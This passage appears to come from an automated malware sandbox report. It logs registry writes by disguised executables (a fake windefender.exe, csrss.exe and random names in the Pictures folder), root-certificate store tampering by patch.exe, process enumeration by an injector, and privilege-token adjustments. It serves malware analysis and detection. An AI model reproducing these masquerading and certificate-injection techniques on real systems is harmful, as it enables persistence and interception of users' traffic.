Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3
d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob value omitted] C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d0101050
5000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300
e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
